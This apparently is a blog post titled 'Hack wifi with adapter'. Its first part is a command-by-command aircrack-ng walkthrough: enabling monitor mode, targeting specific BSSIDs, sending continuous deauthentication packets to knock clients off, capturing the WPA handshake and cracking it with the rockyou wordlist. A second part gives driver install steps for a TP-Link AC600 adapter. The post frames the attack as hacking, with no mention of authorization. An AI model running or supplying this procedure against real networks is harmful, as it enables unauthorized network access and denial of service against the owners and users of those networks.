Hack wifi with adapter



# Monitor Mode

1) kill processes ( Cheak conflict in processes :)

  • sudo airmon-ng check kill


  • 2) Start monitor mode

    • sudo airmon-ng start wlan0

    As you can see now its in monitor mode


    • To stop Monitor mode : airmon-ng stop wlan0mon

    3) Discover the Access points

    • sudo airodump-ng wlan0 
    • sudo airodump-ng wlan0mon
    • 5GHZ :  sudo airodump-ng  --band a wlan0
    • 2.4GHZ :  sudo airodump-ng  --band bg wlan0
    Example : 

    4) Discover the Specific Access points

      • sudo airodump-ng wlan0 -d  B4:3D:08:4B:F5:00
      • sudo airodump-ng wlan0 -d  54:37:BB:A9:76:69

      • 5ghz : sudo airodump-ng wlan0 -d B4:3D:08:4B:F5:01 --band a



      5) Capture Handshake 

        • sudo airodump-ng -w hack3 -c 11 --bssid 54:37:BB:A9:76:69 wlan0

        5) Deauth the BSSID

        • sudo aireplay-ng --deauth 0 -a 54:37:BB:A9:76:69 wlan0

        • sudo ifconfig wlan0 down
        • sudo iwconfig wlan0 mode monitor
        • sudo ifconfig wlan0 up


        !Use Wireshark to open hack file
        wireshark hack1-01.cap
        !Filter Wireshark messages for EAPOL
        eapol

        !Stop monitor mode
        airmon-ng stop wlan0mon

        !Crack file with Rock you or another wordlist
        !Make sure you have rockyou in text format (unzip file on Kali)
        !Replace hack1-01.cap with your file name
        aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt 

        ------------------------------------


        Driver Install Tplink TP-LINK AC600


        Driver Install 

        • sudo su
        • lsusb ( see first if you see the tp-link adapter ) 
        • sudo apt update
        • sudo apt install realtek-rtl88xxau-dkms

        If Doesn't Work than Build and install ( video ) 
        • https://www.youtube.com/watch?v=c8y9D57d2nA&t=26s
        Build and install 
        • cat /etc/os-release   
        • uname -r
        • install 3 files accordingly FROM  : https://kali.download/kali/pool/main/l/linux/

        • wget https://kali.download/kali/pool/main/l/linux/linux-headers-6.8.11-cloud-amd64_6.8.11-1kali2_amd64.deb
        • wget https://kali.download/kali/pool/main/l/linux/linux-headers-6.8.11-common_6.8.11-1kali2_all.deb
        • wget https://kali.download/kali/pool/main/l/linux/linux-kbuild-6.8.11_6.8.11-1kali2_amd64.deb
        Build packages
        • sudo dpkg -i  ( call package names and install ) 
        • git clone https://github.com/morrownr/8821au-20210708
        • sudo apt install bc
        • sudo sh install-driver.sh
        • N/Y ( no then yes ) 

        Git hub Download and install

        • sudo apt update && sudo apt full-upgrade -y
        • sudo apt install git dkms
        • git clone https://github.com/aircrack-ng/rtl8812au
        • cd rtl8812au
        • sudo ./dkms-install.sh 
        • sudo apt install git dkms
         Enable WLAN0 for WIFI Connection on Kali Linux
        Extract and go to directry 
        • make unload
        • make load
        • iwconfig to Cheak ( wlan0 ) 












        Post a Comment

        If you have any doubts, please let me know

        Previous Post Next Post